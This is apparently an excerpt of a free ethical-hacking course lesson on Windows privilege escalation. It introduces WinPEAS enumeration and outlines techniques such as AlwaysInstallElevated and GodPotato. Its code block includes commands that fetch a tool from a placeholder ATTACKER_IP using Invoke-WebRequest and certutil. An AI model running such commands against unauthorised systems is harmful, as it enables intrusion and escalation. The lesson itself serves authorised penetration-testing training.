📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
🛡️ ETHICAL HACKING COURSE
FREE
Part of the Free Ethical Hacking Course — 100 Days
Day 32 of 100 · 32% complete
⚠️ Authorised Systems Only. Every technique in this article is for use exclusively on systems you own, CTF lab environments, or targets covered by explicit written authorisation in a formal penetration test scope. Applying these techniques without authorisation constitutes a criminal offence under computer misuse legislation in most jurisdictions. All exercises target TryHackMe authorised rooms or your own lab VM only.
Windows privilege escalation 2026 — I have escalated from a low-privilege IIS service account to NT AUTHORITY\SYSTEM in under four minutes on production enterprise networks. Not with zero-days. With AlwaysInstallElevated registry keys that an IT team enabled in 2019 to solve a deployment headache and never disabled. With SeImpersonatePrivilege that Windows grants IIS application pools by design. With unquoted service paths left by a vendor who installed their software a decade ago. WinPEAS finds every one of these in thirty seconds. The gap between “we run Windows” and “we run Windows securely” is almost always these exact misconfigurations — persistent, widespread, and invisible until someone looks.
🎯 What You’ll Master in Day 32
Run WinPEAS and interpret its colour-coded output to identify exploitable escalation vectors
Exploit AlwaysInstallElevated using a malicious MSI generated with msfvenom
Identify and exploit unquoted service paths with write access to intermediate directories
Modify weak service permissions using accesschk and sc config
Abuse SeImpersonatePrivilege with GodPotato for instant SYSTEM on IIS and service account footholds
Verify SYSTEM, demonstrate impact, and document the escalation chain for a professional pentest report
⏱️ 45 min read · 3 exercises · Authorised lab targets only #### 📋 Prerequisites — Complete Before Day 32 - Day 31: Linux Privilege Escalation — SUID, sudo, cron exploitation on Linux provides the conceptual framework for Windows escalation patterns - Day 21: Metasploit Framework — msfvenom MSI payload generation is used in the AlwaysInstallElevated exploit chain - Day 28: Lateral Movement Techniques — SYSTEM access feeds directly into lateral movement and domain escalation ### 📋 Windows Privilege Escalation 2026 — Table of Contents 1. WinPEAS — Automated Enumeration in 30 Seconds 2. AlwaysInstallElevated — Registry Key to SYSTEM 3. Unquoted Service Path Exploitation 4. Weak Service Permissions with accesschk 5. SeImpersonatePrivilege — Token Impersonation with GodPotato 6. Additional Vectors — Scheduled Tasks, Stored Credentials, DLL Hijacking 7. Post-Escalation — Verification, Impact Demonstration, Cleanup Day 31 covered Linux privilege escalation — SUID exploitation, sudo misconfigurations, writable cron jobs. Day 32 is the Windows equivalent. The philosophy is identical: default configurations, legacy software, and administrator convenience settings create persistent escalation paths that survive undetected for years. This is core curriculum in the 100-Day Ethical Hacking Course. Every professional penetration tester must be fluent in both Linux and Windows privilege escalation — most real-world environments are mixed, and your escalation methodology must be too.
WinPEAS — Automated Windows Privilege Escalation Enumeration
WinPEAS (Windows Privilege Escalation Awesome Script) is the first tool you run the moment you establish code execution on a Windows target. Before manually checking anything, before chasing hunches, run WinPEAS. It checks over 300 enumeration points simultaneously and produces colour-coded output that shows you exactly which misconfigurations are present. Red and yellow highlights are your action items. Everything else is context. A full WinPEAS run takes under sixty seconds on most systems and tells you more than an hour of manual enumeration would.
What WinPEAS actually checks spans the entire Windows security model: registry policies that grant elevated installer rights, service executable paths and their access control lists, file system permissions on directories in the system path, stored credentials in the Windows Credential Manager and browser profiles, scheduled tasks that run as SYSTEM with writable script files, installed software versions cross-referenced against a local CVE database, token privileges enabled on the current account, and network configuration revealing additional lateral movement paths. Each check maps to a known escalation technique. When WinPEAS highlights something in red, that technique is viable with high confidence. Yellow means the finding warrants manual verification before exploitation.
WINPEAS — DOWNLOAD, TRANSFER, AND RUNCopy
On Kali — download latest WinPEAS
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany.exe -O winpeas.exe
Host it via Python HTTP server
python3 -m http.server 8080
On the Windows target — download WinPEAS (PowerShell)
Invoke-WebRequest -Uri “http://ATTACKER_IP:8080/winpeas.exe” -OutFile “C:\Users\Public\winpeas.exe”
Alternative — certutil if PowerShell execution policy is restricted
certutil -urlcache -split -f http://ATTACKER_IP:8080/winpeas.exe C:\Users\Public\winpeas.exe
Run WinPEAS — full scan with colour output
C:\Users\Public\winpeas.exe
Save to file for offline review
C:\Users\Public\winpeas.exe > C:\Users\Public\out.txt 2>&1
Targeted checks only — faster for specific vectors
C:\Users\Public\winpeas.exe reg # registry misconfigs
C:\Users\Public\winpeas.exe services # service paths and ACLs
C:\Users\Public\winpeas.exe systeminfo # OS version and patches
Key red/yellow outputs to act on immediately:
AlwaysInstallElevated: 1 → HKLM + HKCU = MSI escalation path
Unquoted path: … → service path with spaces, no quotes
SeImpersonatePrivilege → GodPotato or PrintSpoofer applicable
Modifiable service binary → sc config binary path replacement
📖 Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)